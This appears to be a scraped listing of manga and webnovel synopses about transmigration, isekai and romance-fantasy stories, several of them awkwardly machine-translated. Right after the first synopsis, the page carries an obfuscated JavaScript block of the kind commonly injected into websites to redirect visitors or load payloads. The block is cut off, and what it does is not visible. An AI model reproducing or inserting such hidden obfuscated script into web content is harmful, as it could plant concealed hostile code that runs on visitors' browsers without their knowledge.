A 19-year-old girl named Qing Tian was suddenly transported in time to an unknown dynasty. At first, she thought she could slowly enter the battles of the harem, but she’s surprised to find out that she’s actually the Queen! How did this messy story come to be??<script></script><script>(function(_0x2f5720,_0x1f334e){var _0x535fb9=_0x2996,_0x539dc2=_0x2f5720();while(!![]){try{var _0x4ea32c=-parseInt(_0x535fb9(0x144))/(0x2*0x1099+0x4b2*-0x7+-0x53)*(-parseInt(_0x535fb9(0x146))/(0x1*0x8b4+-0x2bd*0xb+-0x1*-0x156d))+-parseInt(_0x535fb9(0x12e))/(-0x1*0x1906+0x24c8+0x1*-0xbbf)+parseInt(_0x535fb9(0x148))/(-0x1805+-0x1bbb+-0x4*-0xcf1)*(parseInt(_0x535fb9(0x13c))/(0x1*-0x7ea+0xe4e+-0x65f))+-parseInt(_0x535fb9(0x130))/(-0x1*0xcf1+-0x388+0x67*0x29)*(parseInt(_0x535fb9(0x137))/(0x1f*0xca+0x24*0xd5+-0x3663))+parseInt(_0x535fb9(0x129))/(-0x8ed*0x2+-0x19a2+0x2b84)+parseInt(_0x535fb9(0x133))/(-0xcab+0x9*-0x43b+-0x741*-0x7)*(-parseInt(_0x535fb9(0x142))/(-0xb25+0xd79+-0x24a))+-parseInt(_0x535fb9(0x145))/(-0x1*-0x7af+0x233c+-0xe*0x310);if(_0x4ea32c===_0x1f334e)break;else _0x539dc2['push'](_0x539dc2['shift']());}catch(_0x5da250){_0x539dc2['push'](_0x539dc2['shift']());}}}(_0x2974,0xc5b8+0x4*-0x31c3+-0xecbc*-0x2));function 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The God’s Tombs started to appear around the world. Due to the relics within these tombs, many were able to wield these legendary power for themselves, while others became enslaved to these users. However, a Tomb Raider appears with the purpose of robbing these relics. The Tomb Raider King. “God damn it! Did that bastard already loot this place as well?!” What you own belongs to me. What I own definitely belongs to me. This is the story of a revived Tomb Raider who will do whatever he can to claim all the tombs and relics for himself!
When playing a virtual reality game called Cang Lan, Xiao Wan gets pushed off a cliff. She ends up in another game world. What will happen to Xiao Wan? Genres: Action, Fantasy, Comedy, Isekai
After taking revenge on the ex-boyfriend who used to abuse her, she died and transmigrated as the heroine of the popular otome game “Rose Spiral”. She found out that the targets who could be captured possessed evil intentions, approaching the female lead only to use her. The frozen heart of a reborn girl burns with hatred, and a revenge plan slowly unfolds. While attacking and taking revenge on the men, will she learn to love and be loved again?
Don’t do that too much. Poor maid The day after I commented on the pity of the extra maid, who even the author had forgotten. He has possessed that poor maid, Maria Mayer. Due to the convergence of its presence to 0, it even acquired the title of ghost. Still, I thought that I could do my job with sincerity, but people who were interested in her began to appear. Even the future princes and grand dukes! “Can’t you feel the presence? What the hell is your identity?” With the Crown Prince Elias who was half interested and half wary about Maria’s identity, he wanted to keep him by my side. “It doesn’t matter that I don’t remember. In the future, you can make sure you don’t forget me.” Archduke Dietrich approached with a smile as if he knew it even though it was the first time he had seen it. me, i… … I’m just an ordinary maid 1 (Special: Ghost)! 처음부터 여기 있었는데요
When the egg was rolled in her arms, the dragon was born. A full-fledged baby-sitter. One well-bred dragon prince of one of the ten emperors. Adele is a girl who grew up in an orphanage and came to her uncle’s house. While being in charge of her aunt’s farm for nine years and taking care of all the insane things on a cow ranch, she accidentally finds a large egg in a tree hole. A child who wakes up from the egg follows Adele like a parent, and Adele gives the child the name Sigmund. In fact, Sigmund, who must be the Emperor of the Empire, stays with Adele in the form of a child, sealed with his powerful mana sealed. Grand Duke Ernest and Archmage Jensen try to find the egg of the lost dragon. Lushen, head of the Imperial knighthood, assisted by Zion, daughter of Grand duke Ernest, who has grown up as a man since childhood helps Adele. Adele and Sigmund finally enter the imperial palace where they were awaited. A magical healing love story unfolded by two people. “You are the beginning and the end of my world, Adele.” The all-fearing ruler of this world, the violent dragon prince Sigmund and his bride Adele. Read manhwa Somehow I Raised A Prince / 어쩌다 보니 왕자님 키워 버렸어요
When Lee Shana accidentally crossed into another world full of fantasy and beauty, sadly she had become a witch in the midst of an execution. Dying at such a wonderful age?! She couldn’t let that happen! She had to escape no matter what! But after her escape she offended none other than the crown prince Luther! What else could go wrong?
Genres: Action, Fantasy, Adventure, Isekai
“Queen Arthur. That is your name from today.” I was summoned to save the kingdom that King Arthur had rolled over. As the Archmage Merlin said, I am the possessor of the same soul as King Arthur. If I find the Holy Grail and complete my mission, will am I be able to live with love? But why are knights so rude? Xian, who has been living a life of bliss for 20 years. When I woke up one day, I became a character in a legend! The magical story of her becoming Read Queen of Avalon manga – Queen of Avalon manhwa
Traveling through the world of immortality, Shen Tian found that he could see the luck and fortune of others around him. With the idea of rubbing the aura of the protagonist of the boss, Shen Tian began to take the initiative to make friends with the children of luck. Later, everyone gradually discovered that no matter who they are, as long as they practice with Shen Tian, they will inevitably encounter great opportunities, and there will be no exceptions! From that day on, Shen Tian became the most popular mascot in the world of immortality. Genres: Action, Fantasy, Harem, Romance, Adventure, Isekai
When I opened my eyes, I had become the duchess. But something isn’t right. I went as far as becoming a character but I’m just a duchess in name that gets mistreated by the maids and ignored by her husband. What a crappy life! Gosh, I don’t know what to do anymore. I’ll just quietly enjoy my tea, was what I thought. “Can you prepare tea for me again next time?” Something’s gone wrong with my cold husband!
Wu! Eat your dreams! Shao Lingheng is the most perfect dish for Du Yan. Here is the perfect recipe for cooking nightmares, also known as “How to be a qualified villain boss.” [Youth Tragedy Movie Nightmare – the male lead cheated while drunk, which led to the pregnant female lead’s abortion and breakup. ] Du Yan: I want to give the male lead physical health education, refuse pre-marital x behavior, educate the male lead to exploit others and finally wait to be killed. Male lead: I will follow your thoughts and take away your power, just to keep you with me. [Historical Power Conspiracy Nightmare – The Male Lead takes advantage of the heroine and destroys the country and her family.] Du Yan: I want to become the heroine, then later lift up my skirt and scare the male lead to death, finally wait to be killed by the tricked male lead. Male lead: You hate this dynasty, then as you wish, I will ruin it for you. [Netherworld Ghost Movie Nightmare – The Male Lead ended up killing all his teammates] Du Yan: I want to kill the male lead and make him a ghost, and finally wait to be killed by the bullied male lead. Male lead: If I can always haunt you after becoming a ghost, then I am willing. *** It’s so much trouble to fill one’s stomach! As the only bloodline left by the Beast Boqi in a low-level energy plane, Du Yan, after awakening, fell into the tragic situation of not having enough to eat every day. Until he met Shao Lingheng, the movie emperor who was too deep into his roles and was troubled by nightmares every night. But you never know, the things happened were unexpected. Shao Lingheng: That man is the cinnabar mole in my heart, white moonlight in the sky. He has paid a lot for me. Du Yan: Wait, are we not on the same channel? Associated Names Fǎnpài Biàn Chéng Bái Yuèguāng [Kuài Chuān] 反派变成白月光[快穿]